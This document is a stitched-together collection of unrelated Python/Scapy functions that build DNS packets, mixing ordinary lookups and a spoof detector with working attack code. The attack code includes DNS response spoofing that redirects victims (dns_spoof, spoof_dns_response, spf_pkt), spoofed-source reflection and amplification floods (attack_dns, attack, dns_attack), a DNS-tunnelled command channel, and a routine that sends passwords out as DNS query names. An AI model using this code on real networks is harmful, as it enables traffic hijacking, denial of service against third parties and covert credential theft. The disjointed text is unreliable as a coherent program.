def main(): """ Add Documentation here """ # print DNS().show() dns_packet = DNS(qdcount=1) / DNSQR(qname='www.google.com') # print dns_packet.show() # print ls(UDP) # dns_packet = UDP(sport=24601, dport=53)/DNS(qdcount=1)/DNSQR(qname='www.google.com') dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS( qdcount=1, rd=1) / DNSQR(qname='www.google.com') dns_packet.show() print dns_packet.show()
def create_stream(self, src_if): """Create input packet stream for defined interface. :param VppInterface src_if: Interface to create packet stream for. """ good_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) / IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) / DNS(rd=1, qd=DNSQR(qname="bozo.clown.org"))) bad_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) / IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) / DNS(rd=1, qd=DNSQR(qname="no.clown.org"))) pkts = [good_request, bad_request] return pkts
def dns_spoof(pkt): global s, hosts, my_ip spoofed_ip = None if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt: print('query for: ' + pkt[DNSQR].qname) if pkt[DNSQR].qname[:-1] in hosts: spoofed_ip = hosts[pkt[DNSQR].qname[:-1]] print('will inject') elif len(hosts) == 0: spoofed_ip = my_ip else: print('wont inject') return spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \ / UDP(dport=pkt[UDP].sport, sport=53) \ / DNS(id=pkt[DNS].id, qr=1L, qd=DNSQR(qname=pkt[DNSQR].qname), an=DNSRR(rrname=pkt[DNS].qd.qname, rdata=spoofed_ip) ) sent = s.sendto(str(spoofed_pkt), (pkt[IP].src, pkt[UDP].sport)) if sent < 1: print('There was a problem sending.') else: print('injected')
def get_data(pkt: IP): try: client_message = pkt[DNSQR].qname[:-1].decode('utf-8') add_new_client = False for client in clients: if client.receiver_socket[ 1] == -1 and client.sender_socket == address: add_new_client = True client.receiver_socket = (client.receiver_socket[0], int(client_message)) if not add_new_client: print( time.ctime(time.time()) + str(address) + " => " + str(client_message)) for client in clients: if client.sender_socket != address: try: if client.receiver_socket[1] != -1: p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \ / DNS(rd=1, qd=DNSQR(qname=client_message)) print(client.receiver_socket[1]) send(p, verbose=0) print("Message was sent to", client) except socket.error as err: print(err) except socket.error as err: print(err) clients_to_remove.append(address)
def poke(self): question = DNS(rd=1, qd=DNSQR(qname='www.gov.cn')) if self.sniffer: packet1 = IP( src=self.src, dst=self.dst, id=self.ttl * 10 + 1, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet1) self.report['PACKETS'].append(('PACKET_1', packet1)) if not self.one_packet_only: packet2 = IP(src=self.src, dst=self.dst, id=self.ttl * 10 + 2, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet2) self.report['PACKETS'].append(('PACKET_2', packet2)) packet3 = IP(src=self.src, dst=self.dst, id=self.ttl * 10 + 3, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet3) self.report['PACKETS'].append(('PACKET_3', packet3)) else: self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) atexit.register(self.udp_socket.close) self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl) self.udp_socket.settimeout(0) self.udp_socket.bind( (self.src, self.sport )) # if sport change the route going through might change self.udp_socket.sendto(str(question), (self.dst, self.dport))
def spoof_dns_response(pkt): global ip_of_network_interface, ip_domain_mapping spoofed_ip = None # strip the dot at the end of domain name and decode the bytes domain_name_req = pkt[DNSQR].qname[:-1].decode('utf-8') if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt: if len(ip_domain_mapping) > 0: # check if mapping for it is present in host file supplied if ip_domain_mapping and domain_name_req in ip_domain_mapping: spoofed_ip = ip_domain_mapping[domain_name_req] else: print('Not spoofing for ' + domain_name_req + '\n') return elif len(ip_domain_mapping) == 0: spoofed_ip = ip_of_network_interface print('Spoofing: ' + domain_name_req + ' ' + spoofed_ip + '\n') #build spoof response spoof_response = IP(dst=pkt[IP].src, src=pkt[IP].dst) \ / UDP(dport=pkt[UDP].sport, sport=53) \ / DNS(id=pkt[DNS].id,qr=1,qd=DNSQR(qname=pkt[DNSQR].qname),an=DNSRR(rrname=pkt[DNS].qd.qname,rdata=spoofed_ip)) # send response to victim send(spoof_response)
def send_dns(ip, port): print(f"dns: {ip}:{port}") pkt = IP(dst=ip) / UDP(sport=54323, dport=port) / DNS( rd=1, id=12345, qd=DNSQR(qtype=16, qname="anakena.dcc.uchile.cl" )) # qtype=1 is A and DNS Request ID is 12345 # Captura de lo enviado capture_1 = StringIO() save_stdout = sys.stdout sys.stdout = capture_1 pkt.show() sys.stdout = save_stdout print("len enviado:" + str(len(capture_1.getvalue()))) print(f"Sending: {pkt.summary()}") # ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A ans = sr1(pkt, verbose=1) print(f"received:") # Captura de la respuesta capture = StringIO() save_stdout = sys.stdout sys.stdout = capture ans.show() sys.stdout = save_stdout print(f'RECEIVED LEN :{len(capture.getvalue())}\n') quotient = len(capture.getvalue()) / len(capture_1.getvalue()) print(quotient)
def send_req(qname: bytes): """ Send the DNS request with the answer to the Authoritative DNS server. :param qname: the fake url :return: code of answer, next command to perform. """ cmd_code, command = SERVER_COMMANDS['error&retransmission'], "" while cmd_code == SERVER_COMMANDS['error&retransmission']: # create the DNS query and send it: # todo: get automatically the local dns server ip dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / \ DNS(rd=1, qd=DNSQR(qname=qname, qtype='CNAME')) response = sr1(dns_req, verbose=False) cmd_code, command = parse_response(response[DNSRR]) # check if more parts are need to be send if cmd_code == SERVER_COMMANDS['more']: tmp_data = command while cmd_code != SERVER_COMMANDS['last']: # send an 'ACK' to server and parse the next part: fake_domain = identify + b'.' + \ build_req( CLIENT_COMMANDS['ok&continue'], b'continue') + DOMAIN dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / DNS(rd=1, qd=DNSQR(qname=fake_domain, qtype='CNAME')) response = sr1(dns_req, verbose=False) cmd_code, command = parse_response(response[DNSRR]) tmp_data += command # save the parts in temp var command = tmp_data return cmd_code, command
def main(): message = input('enter your message: ') for char in message: url = f'www.{get_word(char)}.com' print(url) send( IP(dst=ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=url, qtype="A")))
def attack_dns(self): for ip in self.server_list.dns: packet = IP(src=self.target_ip, dst=ip) / UDP( sport=self.target_port, dport=53) / DNS( rd=1, qd=DNSQR(qname="google.com", qtype="ANY")) t = threading.Thread(target=self.boom, args=packet) print("sending spoofed udp dns packet to : " + ip) t.start() self.scapy_threads.append(t)
def main(): """ Add Documentation here """ dest = raw_input("enter the site:") dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS( qdcount=1, rd=1) / DNSQR(qname=dest) response_packet = sr1(dns_packet) print response_packet[DNSRR][1].rdata
def send_dns(ip, port): print(f"dns: {ip}:{port}") pkt = IP(dst=ip) / UDP(sport=55312, dport=port) / DNS(rd=1, id=12345, qd=DNSQR( qtype=1, qname="spoofed.lab4.cc5312.xor.cl")) # qtype=1 is A and DNS Request ID is 12345 print(f"Sending: {pkt.summary()}") # ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A ans = sr1(pkt, verbose=1) print(f"received:") ans.show() print(ans.command())
def run(self): """ This function sends the Password data """ for password in self.user_data: time.sleep(10) answer: Union[Union[PacketList, List[Any]], Any] = sr1( IP(dst=self.dns_server_ip) / UDP(dport=self.dns_port) / DNS(rd=1, qd=DNSQR(qname=password)), verbose=0)
def forward_dns(orig_pkt): print(f"Forwarding: {orig_pkt[DNSQR].qname}") response = sr1( IP(dst=ip_forward) / UDP(sport=orig_pkt[UDP].sport) / DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0) resp_pkt = IP(dst=orig_pkt[IP].src, src=ip_gateway) / UDP(dport=orig_pkt[UDP].sport) / DNS() resp_pkt[DNS] = response[DNS] send(resp_pkt, verbose=0) return f"Responding to {orig_pkt[IP].src} | time: {time.time()}"
def extract_dns(ether_pkt): source_mac = ether_pkt.src.lower() if ether_pkt[DNS].qr == 0: # DNS request # Build DNSQR structure to extract name, convert from bytes to str qname = DNSQR(ether_pkt[DNS].qd).qname.decode() if qname in globals.DEVICES[source_mac]["DNS"].keys(): globals.DEVICES[source_mac]["DNS"][qname]["count"] += 1 else: globals.DEVICES[source_mac]["DNS"][qname] = {"count": 1}
def spf_pkt(sniffed_dns_pkt): """get a DNS Request packet. Returns DNS Response packet directing to the custom ip.""" sp_pkt = IP(src=server_ip, dst=sniffed_dns_pkt[IP].src) \ / UDP(dport=sniffed_dns_pkt[UDP].sport, sport=53) \ / DNS(id=sniffed_dns_pkt[DNS].id, qr=1, opcode=sniffed_dns_pkt[DNS].opcode, aa=1, rd=0, qdcount=sniffed_dns_pkt[DNS].qdcount, ancount=1, nscount=1, qd=DNSQR(qname=sniffed_dns_pkt[DNSQR].qname), an=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, ttl=86400, rdata=custom_ip), ns=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, type=2, rdata=custom_ip), ar=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, rdata=custom_ip)) return sp_pkt
def send_receive_query(self, dns_server='8.8.8.8'): """ send the query and receive the results DNS Resource Records @param dns_server:the ip of a local dns server @return: list of all rdata from the DNS Resource Records """ pack = IP(dst=dns_server) / UDP() / DNS( qd=DNSQR(qname=self.query_data, qtype=self.query_type)) result = sr1(pack, verbose=0) if (DNS in result) and (DNSRR in result): return [result[DNSRR][x].rdata for x in range(result[DNS].ancount)]
def build_query(layer: dict, domain: str) -> object: pkt = IP(dst=layer["dst"]) pkt /= UDP(dport=53) pkt /= DNS( rd=0, # no recursion desired qr=DNSHeaders.QR.Query, qd=DNSQR(qname=layer["dns"]["qname"], qtype=DNSHeaders.Type.HostAddr), ) return Packet(pkt, domain)
def handle_communication(): # Send Receiver Socket Information. # client_sender_socket.write(bytes(str(new_port), 'utf-8')) alias = input("Name: ") ip, new_port = client_receiver_socket.getsockname() p = IP(dst=server[0]) / TCP(dport=server[1]) \ / DNS(rd=1, qd=DNSQR(qname=str(new_port))) send(p, verbose=0) print("Please Enter Your Messages!\n") message = input("") while message != 'q': if message != '': p = IP(dst=server[0]) / TCP(dport=server[1]) \ / DNS(rd=1, qd=DNSQR(qname=(alias + ": " + message))) send(p, verbose=0) # client_sender_socket.write(bytes(alias + ": " + message, 'utf-8')) message = input("")
def dns_packet(msg, type_d): if type_d == 'PTR': msg = '.'.join(msg.split(".")[::-1]) + '.in-addr.arpa' pkt = IP(dst=DN) / UDP(sport=23456, dport=53) / DNS(qdcount=1) / DNSQR( qtype=type_d, qname=msg) response = sr1(pkt, verbose=0) ans = response[DNS].ancount for i in range(ans): if type_d == 'PTR': print(response[DNSRR][i].rdata.decode("utf-8")) if type_d == 'A': print(response[DNSRR][i].rdata)
def attack(): request = (IP(src=spoof_ip, dst=destination_ip) / UDP(dport=53, sport=RandShort() if attack_web else 53) / DNS(id=RandShort(), rd=1, qdcount=1, cd=1, qd=DNSQR(qname="example.com", qtype=255, qclass=1), ar=DNSRROPT(rclass=65527, rdlen=0))) print("sending packets of length:", len(request), " to ", destination_ip, " pretending to be ", spoof_ip) send(request, loop=1, count=None)
def build_query(layer: dict, domain: str) -> object: pkt = IP(dst=layer["dst"], tos=0x28) pkt /= UDP(sport=randint(0, 2 ** 16 - 1), dport=53) pkt /= DNS( id=randint(0, 2 ** 16 - 1), rd=0, # no recursion desired qr=DNSHeaders.QR.Query, # requests must be of type TXT otherwise our answers (of type TXT) # don't get transmitted if recursion occured qd=DNSQR(qname=layer["dns"]["qname"], qtype=DNSHeaders.Type.Text), ) return Packet(pkt, domain)
def get_ip_from_url(): """sends a DNS request to the specified url. returns the matching ip got from the server""" try: print("custom ip setup") custom_url = input("enter url to redirect packets to: ") ip = sr1( IP(dst="8.8.8.8") / UDP(sport=RandShort(), dport=53) / DNS(rd=1, qd=DNSQR(qname=custom_url, qtype="A"))).an.rdata print("----------------------------------------\n") except AttributeError: print("Invalid url. Try again.") ip = get_ip_from_url() return ip
def poke(self): question = DNS(rd=1, qd=DNSQR(qname='twitter.com')) if self.sniffer: packet = IP(dst=self.dst, src=self.src, id=self.ttl, ttl=self.ttl) / UDP( sport=self.sport) / question networking.send(packet) self.report['PACKETS'].append(('QUESTION', packet)) else: self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) atexit.register(self.udp_socket.close) self.udp_socket.settimeout(0) self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl) self.udp_socket.bind((self.src, self.sport)) self.udp_socket.sendto(str(question), (self.dst, self.dport))
def check_protocol_on_port(_socket) -> str: try: _socket.send(HTTPRequest().build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if HTTPResponse(_pkt=pkt_response).Status_Code != 0: return 'http' except: pass try: _socket.send('HELO'.encode()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) data = pkt_response.decode() int(data[:3]) return 'smtp' except: pass try: _socket.send('USER mrose'.encode()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) data = pkt_response.decode() if any(['+OK' in data, '-ERR' in data]): return 'pop3' except: pass try: _socket.send(DNS(qr=0, qd=DNSQR()).build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if DNS(_pkt=pkt_response).qr == 1: return 'dns' except: pass try: _socket.send(NTPHeader().build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if NTPHeader(_pkt=pkt_response).recv != 0: return 'ntp' except: pass return ''
def forward_dns(orig_pkt: IP): print(f"Forwarding: {orig_pkt[DNSQR].qname}") response = sr1( IP(dst='8.8.8.8') / UDP(sport=orig_pkt[UDP].sport) / DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0, ) resp_pkt = IP(dst=orig_pkt[IP].src, src=DNS_SERVER_IP) / UDP( dport=orig_pkt[UDP].sport) / DNS() resp_pkt[DNS] = response[DNS] send(resp_pkt, verbose=0) return f"Responding to {orig_pkt[IP].src}"
def dns_attack(dst_ip, src_ip): a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip b = UDP(dport=53) c = DNS(id=1, qr=0, opcode=0, tc=0, rd=1, qdcount=1, ancount=0, nscount=0, arcount=0) c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1) p = a / b / c send(p)
def detectLLMNRSpoof(name): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, MULTICAST_TTL) sock.setblocking(0) request = LLMNRQuery(id=RandShort(), qd=DNSQR(qname=name)) sock.sendto(bytes(request), (LLMNRBroadcast, LLMNRBroadcastPort)) try: (ready, ar1, ar2) = select([sock], [], [], 5) if len(ready) > 0: p = sock.recv(10240) response = LLMNRResponse(p) return response.an.rdata except socket.error as sox: logging.error(sox) return None
def dns_lookup(url): """ The function sends a dns request to 8.8.8.8 and prints the response :param url: the requested url to find :type url: str :return: None :rtype: None """ ethmsg = Ether() ipmsg = IP(dst=DNS_IP) udpmsg = UDP(sport=SRC_PORT, dport=DNS_PORT) dnsmsg = DNS(rd=1, qd=DNSQR(qname=url)) msg = ethmsg / ipmsg / udpmsg / dnsmsg ans = srp1(msg, verbose=0) t = datetime.now().microsecond return ans[DNS][DNSRR].rdata
def get_response(url): """ The function sends a dns request to 8.8.8.8 and prints the response :param url: the requested url to find :type url: str :return: None :rtype: None """ ethmsg = Ether() ipmsg = IP(dst=DNS_IP) udpmsg = UDP(sport=SRC_PORT, dport=DNS_PORT) dnsmsg = DNS(rd=1, qd=DNSQR(qname=url)) msg = ethmsg / ipmsg / udpmsg / dnsmsg ans = srp1(msg, verbose=0) print(ans.show()) print("IP: " + ans[DNS][DNSRR].rdata)